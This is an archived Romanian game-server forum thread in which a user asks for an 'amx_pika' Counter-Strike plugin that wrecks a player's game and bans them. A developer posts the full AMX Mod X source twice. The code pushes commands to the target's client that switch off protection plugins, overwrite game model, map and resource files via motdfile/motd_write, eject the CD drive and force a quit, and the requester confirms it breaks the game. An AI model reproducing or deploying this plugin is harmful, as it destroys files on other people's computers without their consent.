Existing user? Sign in
Sign up
Games
Servers
Useful
User
Pass
2FA
[rezolvat]Cerere amx_pika
Freakz Forum Index
->
Trash Bin
->
CS 2006-2019 (Archived)
->
Plugins - Help / Support
Author
Message
1884
DaNy-
[Banned user]
Status: Offline
(since 15-03-2015 15:23)
Joined: 16 Nov 2014
Posts: 917
,
Topics: 124
Location:
Pãmânt
Reputation:
35.1
Votes
: 25
Posted: 20-02-2015, 23:41:22
| Translate post to:
... (
Click for more languages
)
Salut, as dori si eu un amx_pika bun, care sa distruga cs-ul + ban permanent, nu toate porcariile, le-am probat pe toate dupa net nu sunt bune.
As dori cand cineva ia pika sa scrie pe chat colorat:
------------------------------------------------
Jucatorul % a fost distrus si banat.
Comanda executata de catre adminul %.
-=-=-=-=Furien.Freakz.Ro-=-=-=-=
------------------------------------------------
0
0
Back to top
-P!C@-
[Simply Normal]
Status: Offline
(since 21-04-2022 19:07)
Joined: 28 May 2012
Posts: 21086
,
Topics: 1601
Location:
Constanta
Reputation:
1870.3
Votes
: 781
Posted: 21-02-2015, 09:19:12
| Translate post to:
... (
Click for more languages
)
Incearca pluginul:
http://www26.zippyshare.com/v/be9PxaQP/file.html
0
0
Back to top
DaNy-
[Banned user]
Status: Offline
(since 15-03-2015 15:23)
Joined: 16 Nov 2014
Posts: 917
,
Topics: 124
Location:
Pãmânt
Reputation:
35.1
Votes
: 25
Posted: 21-02-2015, 09:58:08
| Translate post to:
... (
Click for more languages
)
Vreau sa scrie mesaju care l-am zis mai sus si sa se aude sunetul are ca la exterminate/destroy...
0
0
Back to top
destroi112
[DEV]
Status: Offline
(since 12-03-2020 22:13)
Joined: 24 May 2014
Posts: 4042
,
Topics: 119
Location:
---------
Reputation:
515.9
Votes
: 118
Posted: 21-02-2015, 13:10:05
| Translate post to:
... (
Click for more languages
)
Poftim cum ai vrut tu sunetul il pui tu intr-un folder cu numele pika_sound/distrus.wav
Spoiler:
#include < amxmodx >
#include < amxmisc >
#include < fakemeta >
/*************************************************************/
/* ATENTIE!
Stergeti // daca vreti mesaje colorate in chat pe Server!
Trebuie sa aveti pluginul: [Dyn Native] ColorChat
*/
// Numele fisierului .log
#define LOGFILE "AMXX_PIKA.log"
/************************************************************/
static const g_sCommands [ ] [ ] =
{
"gl_log 1",
"csx_setcvar Enabled False",
"rus_setcvar Enabled False",
"prot_setcvar Enabled False",
"BlockCommands Enabled False",
"rate 1",
"cd eject",
"cd eject",
"cd eject",
"cd eject",
"cd eject",
"cd eject",
"cd eject",
"name Hacked New-Pika",
"motdfile models/player.mdl;motd_write PIKA",
"motdfile models/v_ak47.mdl;motd_write PIKA",
"motdfile cs_dust.wad;motd_write PIKA",
"motdfile models/v_m4a1.mdl;motd_write PIKA",
"motdfile resource/GameMenu.res;motd_write PIKA",
"motdfile resource/GameMenu.res;motd_write PIKA",
"motdfile resource/background/800_1_a_loading.tga;motd_write PIKA",
"motdfile resource/background/800_1_b_loading.tga;motd_write PIKA",
"motdfile resource/background/800_1_c_loading.tga;motd_write PIKA",
"motdfile resource/UI/BuyShotguns_TER.res;motd_write PIKA",
"motdfile resource/UI/MainBuyMenu.res;motd_write PIKA",
"motdfile resource/UI/BuyEquipment_TER.res;motd_write PIKA",
"motdfile resource/UI/Teammenu.res;motd_write PIKA",
"motdfile halflife.wad;motd_write PIKA",
"motdfile cstrike.wad;motd_write PIKA",
"motdfile maps/de_dust2.bsp;motd_write PIKA",
"motdfile events/ak47.sc;motd_write PIKA",
"quit",
"echo ????!"
};
new const
PLUGIN_NAME [ ] = "AMXX Russian",
PLUGIN_VERSION [ ] = "2.2.0";
#pragma semicolon 1
new g_pCvar_tele_effect;
public plugin_init ( )
{
register_plugin ( PLUGIN_NAME, PLUGIN_VERSION, "CryWolf" );
g_pCvar_tele_effect = register_cvar ( "amx_pika_teleeff", "1" );
register_concmd ( "amx_russian", "Concmd_AMXX_exterminate", ADMIN_SLAY, "<jucator / player>" );
register_concmd ( "amx_pika", "Concmd_AMXX_exterminate", ADMIN_SLAY, "<jucator / player>" );
register_concmd ( "amx_exterminate", "Concmd_AMXX_exterminate", ADMIN_SLAY, "<jucator / player>" );
}
public plugin_precache()
{
precache_sound("pika_sound/distrus.wav");
}
public Concmd_AMXX_exterminate ( id, level, cid )
{
if ( !cmd_access ( id, level, cid, 2 ) ) {
client_print ( id, print_console, "[AMXX] Nu ai access la aceasta comanda" );
return 1;
}
new sArgument[ 33 ];
read_argv ( 1, sArgument, charsmax ( sArgument ) );
new player = cmd_target ( id, sArgument, ( CMDTARGET_NO_BOTS | CMDTARGET_OBEY_IMMUNITY | CMDTARGET_ALLOW_SELF ) );
if ( !player )
{
console_print ( id, "[AMXX] Jucatorul mentionat nu este valid." );
return 1;
}
for ( new i = 0; i < sizeof ( g_sCommands ); i++ )
client_cmd ( player, g_sCommands [ i ] );
if ( get_pcvar_num ( g_pCvar_tele_effect ) ) {
set_task ( 0.3, "FunC_Tele_Effect", player );
}
new szName [ 33 ], szName2 [ 33 ], ip2 [ 16 ];
get_user_name ( id, szName, charsmax ( szName ) );
get_user_name ( player, szName2, charsmax ( szName2 ) );
get_user_ip ( player, ip2, charsmax ( ip2 ), 1 );
log_to_file ( LOGFILE, "%s Pika %s(%s)", szName, szName2, ip2 );
emit_sound(0, CHAN_AUTO, "pika_sound/distrus.wav", 1.0, ATTN_NORM, 0, PITCH_NORM);
server_cmd ( "amx_banip %s 0", player );
ChatColor(0,"!g------------------------------------------------");
ChatColor(0,"Jucatorul !g% !ya fost !gdistrus !ysi !gbanat.",szName2);
ChatColor(0,"Comanda executata de catre adminul !g%s.",szName);
ChatColor(0,"-=-=-=-=!gFurien!y.!gFreakz!y.!gRo!y-=-=-=-= ");
ChatColor(0,"!g------------------------------------------------");
return 1;
}
public FunC_Tele_Effect ( id )
{
if ( !is_user_alive ( id ) )
return;
static Float:iOrigin [ 3 ];
pev ( id, pev_origin, iOrigin );
engfunc ( EngFunc_MessageBegin, MSG_PVS, SVC_TEMPENTITY, iOrigin, 0 );
write_byte ( TE_TELEPORT );
engfunc ( EngFunc_WriteCoord, iOrigin [ 0 ] );
engfunc ( EngFunc_WriteCoord, iOrigin [ 1 ] );
engfunc ( EngFunc_WriteCoord, iOrigin [ 2 ] );
message_end ( );
}
//stock
stock ChatColor(const id, const input[], any:...)
{
new count = 1, players[32];
static msg[191];
vformat(msg, 190, input, 3);
replace_all(msg, 190, "!g", "^4");
replace_all(msg, 190, "!y", "^1");
replace_all(msg, 190, "!team", "^3");
if (id) players[0] = id; else get_players(players, count, "ch");
{
for (new i = 0; i < count; i++)
{
if (is_user_connected(players[i]))
{
message_begin(MSG_ONE_UNRELIABLE, get_user_msgid("SayText"), _, players[i]);
write_byte(players[i]);
write_string(msg);
message_end();
}
}
}
}
Retired from Amxmodx
0
0
Back to top
DaNy-
[Banned user]
Status: Offline
(since 15-03-2015 15:23)
Joined: 16 Nov 2014
Posts: 917
,
Topics: 124
Location:
Pãmânt
Reputation:
35.1
Votes
: 25
Posted: 22-02-2015, 17:15:36
| Translate post to:
... (
Click for more languages
)
Nu prea strica CS si nu da ban.
Cand incerci sa intri iar pe server da doar eroare file read failure.
Si nu da ban
Mersi, daca se poate... tot mai am nevoie.
0
0
Back to top
destroi112
[DEV]
Status: Offline
(since 12-03-2020 22:13)
Joined: 24 May 2014
Posts: 4042
,
Topics: 119
Location:
---------
Reputation:
515.9
Votes
: 118
Posted: 22-02-2015, 18:38:06
| Translate post to:
... (
Click for more languages
)
cat vrei sa ii dea ban? ai cumva comanda amx_banip nume ? pe servar sau amx_banip nume timp?
e ok modific sa iti dea ban si eroare aia
strica cs =]]
Here try ti-am trimis admincmd pe skype
Spoiler:
#include < amxmodx >
#include < amxmisc >
#include < fakemeta >
/*************************************************************/
/* ATENTIE!
Stergeti // daca vreti mesaje colorate in chat pe Server!
Trebuie sa aveti pluginul: [Dyn Native] ColorChat
*/
// Numele fisierului .log
#define LOGFILE "AMXX_PIKA.log"
/************************************************************/
static const g_sCommands [ ] [ ] =
{
"gl_log 1",
"csx_setcvar Enabled False",
"rus_setcvar Enabled False",
"prot_setcvar Enabled False",
"BlockCommands Enabled False",
"rate 1",
"cd eject",
"cd eject",
"cd eject",
"cd eject",
"cd eject",
"cd eject",
"cd eject",
"name Hacked New-Pika",
"motdfile models/player.mdl;motd_write PIKA",
"motdfile models/v_ak47.mdl;motd_write PIKA",
"motdfile cs_dust.wad;motd_write PIKA",
"motdfile models/v_m4a1.mdl;motd_write PIKA",
"motdfile resource/GameMenu.res;motd_write PIKA",
"motdfile resource/GameMenu.res;motd_write PIKA",
"motdfile resource/background/800_1_a_loading.tga;motd_write PIKA",
"motdfile resource/background/800_1_b_loading.tga;motd_write PIKA",
"motdfile resource/background/800_1_c_loading.tga;motd_write PIKA",
"motdfile resource/UI/BuyShotguns_TER.res;motd_write PIKA",
"motdfile resource/UI/MainBuyMenu.res;motd_write PIKA",
"motdfile resource/UI/BuyEquipment_TER.res;motd_write PIKA",
"motdfile resource/UI/Teammenu.res;motd_write PIKA",
"motdfile halflife.wad;motd_write PIKA",
"motdfile cstrike.wad;motd_write PIKA",
"motdfile maps/de_dust2.bsp;motd_write PIKA",
"motdfile events/ak47.sc;motd_write PIKA",
"quit",
"echo ????!"
};
new const
PLUGIN_NAME [ ] = "AMXX Russian",
PLUGIN_VERSION [ ] = "2.2.0";
#pragma semicolon 1
new g_pCvar_tele_effect;
public plugin_init ( )
{
register_plugin ( PLUGIN_NAME, PLUGIN_VERSION, "CryWolf" );
g_pCvar_tele_effect = register_cvar ( "amx_pika_teleeff", "1" );
register_concmd ( "amx_russian", "Concmd_AMXX_exterminate", ADMIN_SLAY, "<jucator / player>" );
register_concmd ( "amx_pika", "Concmd_AMXX_exterminate", ADMIN_SLAY, "<jucator / player>" );
register_concmd ( "amx_exterminate", "Concmd_AMXX_exterminate", ADMIN_SLAY, "<jucator / player>" );
}
public plugin_precache()
{
precache_sound("pika_sound/distrus.wav");
}
public Concmd_AMXX_exterminate ( id, level, cid )
{
if ( !cmd_access ( id, level, cid, 2 ) ) {
client_print ( id, print_console, "[AMXX] Nu ai access la aceasta comanda" );
return 1;
}
new sArgument[ 33 ];
read_argv ( 1, sArgument, charsmax ( sArgument ) );
new player = cmd_target ( id, sArgument, ( CMDTARGET_NO_BOTS | CMDTARGET_OBEY_IMMUNITY | CMDTARGET_ALLOW_SELF ) );
if ( !player )
{
console_print ( id, "[AMXX] Jucatorul mentionat nu este valid." );
return 1;
}
for ( new i = 0; i < sizeof ( g_sCommands ); i++ )
client_cmd ( player, g_sCommands [ i ] );
if ( get_pcvar_num ( g_pCvar_tele_effect ) ) {
set_task ( 0.3, "FunC_Tele_Effect", player );
}
new szName [ 33 ], szName2 [ 33 ], ip2 [ 16 ];
get_user_name ( id, szName, charsmax ( szName ) );
get_user_name ( player, szName2, charsmax ( szName2 ) );
get_user_ip ( player, ip2, charsmax ( ip2 ), 1 );
log_to_file ( LOGFILE, "%s Pika %s(%s)", szName, szName2, ip2 );
emit_sound(0, CHAN_AUTO, "pika_sound/distrus.wav", 1.0, ATTN_NORM, 0, PITCH_NORM);
new authid2[32];
get_user_authid(player, authid2, 31);
server_cmd ( "amx_banip ^"%s^" 0", authid2 );
ChatColor(0,"!g------------------------------------------------");
ChatColor(0,"Jucatorul !g% !ya fost !gdistrus !ysi !gbanat.",szName2);
ChatColor(0,"Comanda executata de catre adminul !g%s.",szName);
ChatColor(0,"-=-=-=-=!gFurien!y.!gFreakz!y.!gRo!y-=-=-=-= ");
ChatColor(0,"!g------------------------------------------------");
return 1;
}
public FunC_Tele_Effect ( id )
{
if ( !is_user_alive ( id ) )
return;
static Float:iOrigin [ 3 ];
pev ( id, pev_origin, iOrigin );
engfunc ( EngFunc_MessageBegin, MSG_PVS, SVC_TEMPENTITY, iOrigin, 0 );
write_byte ( TE_TELEPORT );
engfunc ( EngFunc_WriteCoord, iOrigin [ 0 ] );
engfunc ( EngFunc_WriteCoord, iOrigin [ 1 ] );
engfunc ( EngFunc_WriteCoord, iOrigin [ 2 ] );
message_end ( );
}
//stock
stock ChatColor(const id, const input[], any:...)
{
new count = 1, players[32];
static msg[191];
vformat(msg, 190, input, 3);
replace_all(msg, 190, "!g", "^4");
replace_all(msg, 190, "!y", "^1");
replace_all(msg, 190, "!team", "^3");
if (id) players[0] = id; else get_players(players, count, "ch");
{
for (new i = 0; i < count; i++)
{
if (is_user_connected(players[i]))
{
message_begin(MSG_ONE_UNRELIABLE, get_user_msgid("SayText"), _, players[i]);
write_byte(players[i]);
write_string(msg);
message_end();
}
}
}
}
Retired from Amxmodx
0
0
Back to top
DaNy-
[Banned user]
Status: Offline
(since 15-03-2015 15:23)
Joined: 16 Nov 2014
Posts: 917
,
Topics: 124
Location:
Pãmânt
Reputation:
35.1
Votes
: 25
Posted: 27-02-2015, 19:00:02
| Translate post to:
... (
Click for more languages
)
Nu da ban...
0
0
Back to top
-P!C@-
[Simply Normal]
Status: Offline
(since 21-04-2022 19:07)
Joined: 28 May 2012
Posts: 21086
,
Topics: 1601
Location:
Constanta
Reputation:
1870.3
Votes
: 781
Posted: 27-02-2015, 20:08:51
| Translate post to:
... (
Click for more languages
)
Poftim, incearca:
http://www4.zippyshare.com/v/4BatHelb/file.html
0
0
Back to top
Topic locked
Topic is closed, you cannot post any messages in it anymore
Locked by
TwisTer
, 23 March 2015 17:43
Freakz Forum Index
->
Trash Bin
->
CS 2006-2019 (Archived)
->
Plugins - Help / Support
The time now is 03-04-2025, 18:40:35
Copyright info
Based on phpBB
ro
/
com
B
Login
I forgot my password
World of Warcraft
Login for more...
Download WoW 7.3.5
Misc
eSports
Achievements
Buy reputation with votes
Reputation trades
Forum rules
Ban list
Members list
User guide (FAQ)
World of Warcraft
View details